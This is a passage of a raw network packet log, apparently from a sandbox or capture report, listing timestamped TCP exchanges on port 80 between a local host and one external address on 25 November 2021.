                                              Nov 25, 2021 10:53:03.583714962 CET8050423176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.583940029 CET5042380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.617423058 CET8050423176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.633420944 CET8050423176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.633476019 CET8050423176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.633749962 CET5042380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.633833885 CET5042380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.667526007 CET8050423176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.030006886 CET5042480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.064121008 CET8050424176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.064265966 CET5042480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.065979958 CET5042480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.099745989 CET8050424176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.100127935 CET5042480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.133902073 CET8050424176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.149718046 CET8050424176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.149738073 CET8050424176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.149902105 CET5042480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.149913073 CET5042480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.183672905 CET8050424176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.504991055 CET5042580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.538832903 CET8050425176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.539057016 CET5042580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.540647030 CET5042580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.574518919 CET8050425176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.574812889 CET5042580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.608967066 CET8050425176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.624695063 CET8050425176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.624743938 CET8050425176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.624905109 CET5042580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.624952078 CET5042580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.658994913 CET8050425176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.963772058 CET5042680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.997298956 CET8050426176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:04.997513056 CET5042680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:04.999028921 CET5042680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.032367945 CET8050426176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.032639980 CET5042680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.066106081 CET8050426176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.088746071 CET8050426176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.088809967 CET8050426176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.088996887 CET5042680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.089092016 CET5042680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.122698069 CET8050426176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.490324974 CET5042780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.524445057 CET8050427176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.524621010 CET5042780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.526148081 CET5042780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.560266972 CET8050427176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.560452938 CET5042780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.594655991 CET8050427176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.611506939 CET8050427176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.611563921 CET8050427176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.611726046 CET5042780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.611772060 CET5042780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:05.646012068 CET8050427176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.646070957 CET8050427176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:05.646380901 CET5042780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.005074024 CET5042880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.039227009 CET8050428176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.039463043 CET5042880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.040956974 CET5042880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.075020075 CET8050428176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.075196028 CET5042880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.109244108 CET8050428176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.125076056 CET8050428176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.125124931 CET8050428176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.125305891 CET5042880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.125355959 CET5042880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.159504890 CET8050428176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.510909081 CET5042980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.545069933 CET8050429176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.545294046 CET5042980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.546833992 CET5042980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.580991030 CET8050429176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.581208944 CET5042980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.615375996 CET8050429176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.631406069 CET8050429176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.631460905 CET8050429176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:06.631736040 CET5042980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.631839037 CET5042980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:06.666215897 CET8050429176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.018062115 CET5043080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.051892996 CET8050430176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.052120924 CET5043080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.053704023 CET5043080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.087388039 CET8050430176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.087788105 CET5043080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.121666908 CET8050430176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.137511969 CET8050430176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.137588978 CET8050430176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.137851000 CET5043080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.137901068 CET5043080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.172044992 CET8050430176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.477231979 CET5043180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.510447979 CET8050431176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.510637045 CET5043180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.512223005 CET5043180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.545557022 CET8050431176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.545730114 CET5043180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.579040051 CET8050431176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.597048998 CET8050431176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.597099066 CET8050431176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.597312927 CET5043180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.597367048 CET5043180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:07.630794048 CET8050431176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:07.982597113 CET5043280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.016788960 CET8050432176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.017014027 CET5043280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.018557072 CET5043280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.052539110 CET8050432176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.052810907 CET5043280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.087017059 CET8050432176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.102920055 CET8050432176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.102987051 CET8050432176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.103225946 CET5043280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.137206078 CET8050432176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.495707035 CET5043380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.529175997 CET8050433176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.529398918 CET5043380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.530987978 CET5043380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.564268112 CET8050433176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.564483881 CET5043380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.597781897 CET8050433176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.614139080 CET8050433176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.614193916 CET8050433176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:08.614495993 CET5043380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.614577055 CET5043380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:08.648328066 CET8050433176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.008100033 CET5043480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.041482925 CET8050434176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.041799068 CET5043480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.043354988 CET5043480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.076745033 CET8050434176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.076941967 CET5043480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.110536098 CET8050434176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.126302958 CET8050434176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.126359940 CET8050434176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.126625061 CET5043480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.126682043 CET5043480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.160231113 CET8050434176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.518079042 CET5043580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.552165031 CET8050435176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.552455902 CET5043580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.554096937 CET5043580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.588048935 CET8050435176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.588213921 CET5043580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.621967077 CET8050435176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.637712002 CET8050435176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.637725115 CET8050435176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.637943029 CET5043580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.637955904 CET5043580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:09.671881914 CET8050435176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:09.980485916 CET5043680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.013876915 CET8050436176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.014036894 CET5043680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.015599966 CET5043680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.048794985 CET8050436176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.049029112 CET5043680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.082142115 CET8050436176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.101243019 CET8050436176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.101298094 CET8050436176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.101481915 CET5043680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.101521969 CET5043680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.134871006 CET8050436176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.491904974 CET5043780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.525810003 CET8050437176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.525999069 CET5043780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.527559042 CET5043780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.561465979 CET8050437176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.561721087 CET5043780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.595719099 CET8050437176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.612761974 CET8050437176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.612811089 CET8050437176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:10.613018990 CET5043780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.613069057 CET5043780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:10.647228003 CET8050437176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.006330967 CET5043880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.040359974 CET8050438176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.040656090 CET5043880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.042169094 CET5043880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.076227903 CET8050438176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.076443911 CET5043880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.110640049 CET8050438176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.126674891 CET8050438176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.126734972 CET8050438176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.127069950 CET5043880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.127135038 CET5043880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.161386967 CET8050438176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.508512020 CET5043980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.542612076 CET8050439176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.542934895 CET5043980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.544617891 CET5043980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.578578949 CET8050439176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.578764915 CET5043980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.612828970 CET8050439176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.628433943 CET8050439176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.628483057 CET8050439176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:11.628735065 CET5043980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.628784895 CET5043980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:11.663028955 CET8050439176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.015995026 CET5044080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.050093889 CET8050440176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.050398111 CET5044080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.051973104 CET5044080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.086009979 CET8050440176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.086221933 CET5044080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.120187044 CET8050440176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.136879921 CET8050440176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.136957884 CET8050440176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.137139082 CET5044080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.137202978 CET5044080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.171317101 CET8050440176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.532507896 CET5044180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.565970898 CET8050441176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.566152096 CET5044180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.567728996 CET5044180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.601051092 CET8050441176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.601227045 CET5044180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.634594917 CET8050441176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.651314974 CET8050441176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.651391029 CET8050441176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.651628971 CET5044180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.651671886 CET5044180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:12.685034037 CET8050441176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:12.978260040 CET5044280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.012052059 CET8050442176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.012281895 CET5044280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.013848066 CET5044280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.047619104 CET8050442176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.047872066 CET5044280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.081733942 CET8050442176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.102065086 CET8050442176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.102089882 CET8050442176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.102360010 CET5044280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.102379084 CET5044280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.136168003 CET8050442176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.408236027 CET5044380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.441715002 CET8050443176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.441874981 CET5044380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.443384886 CET5044380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.476912022 CET8050443176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.477229118 CET5044380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.510834932 CET8050443176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.528346062 CET8050443176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.528413057 CET8050443176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.528621912 CET5044380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.528683901 CET5044380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.562150955 CET8050443176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.914117098 CET5044480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.948216915 CET8050444176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.948487997 CET5044480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.950037956 CET5044480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:13.984076977 CET8050444176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:13.984283924 CET5044480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.018337011 CET8050444176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.034276009 CET8050444176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.034326077 CET8050444176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.034555912 CET5044480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.068670034 CET8050444176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.426191092 CET5044580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.459595919 CET8050445176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.459927082 CET5044580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.461541891 CET5044580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.494776011 CET8050445176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.494992971 CET5044580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.528168917 CET8050445176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.544886112 CET8050445176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.544909954 CET8050445176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.545171022 CET5044580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.545213938 CET5044580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.578685999 CET8050445176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.928550959 CET5044680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.961905956 CET8050446176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.962106943 CET5044680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.963607073 CET5044680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:14.996886015 CET8050446176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:14.997045040 CET5044680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.030352116 CET8050446176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.049539089 CET8050446176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.049587011 CET8050446176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.049904108 CET5044680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.049952984 CET5044680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.083425045 CET8050446176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.424977064 CET5044780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.459121943 CET8050447176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.459300995 CET5044780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.460895061 CET5044780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.494870901 CET8050447176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.495127916 CET5044780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.529143095 CET8050447176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.545490980 CET8050447176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.545569897 CET8050447176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.545782089 CET5044780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.545841932 CET5044780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.579898119 CET8050447176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.935666084 CET5044880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.969036102 CET8050448176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:15.969269991 CET5044880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:15.970796108 CET5044880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.004141092 CET8050448176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.004349947 CET5044880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.037642956 CET8050448176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.055986881 CET8050448176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.056035995 CET8050448176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.056334972 CET5044880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.056384087 CET5044880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.089716911 CET8050448176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.407608986 CET5044980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.441735029 CET8050449176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.442020893 CET5044980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.443542957 CET5044980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.477485895 CET8050449176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.477766037 CET5044980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.511792898 CET8050449176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.527874947 CET8050449176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.527925968 CET8050449176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.528095007 CET5044980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.528141975 CET5044980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.562196016 CET8050449176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.911900997 CET5045080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.945207119 CET8050450176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.945455074 CET5045080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.946928024 CET5045080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:16.980247021 CET8050450176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:16.980422020 CET5045080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.013851881 CET8050450176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.030407906 CET8050450176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.030462980 CET8050450176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.030607939 CET5045080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.030666113 CET5045080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.064218044 CET8050450176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.425076008 CET5045180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.459089994 CET8050451176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.459312916 CET5045180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.460875988 CET5045180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.494889021 CET8050451176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.495172024 CET5045180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.529124022 CET8050451176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.544984102 CET8050451176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.545032978 CET8050451176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.545196056 CET5045180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.545244932 CET5045180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.579411030 CET8050451176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.925724983 CET5045280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.959781885 CET8050452176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.959959984 CET5045280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:17.961555958 CET5045280192.168.11.20176.223.209.128
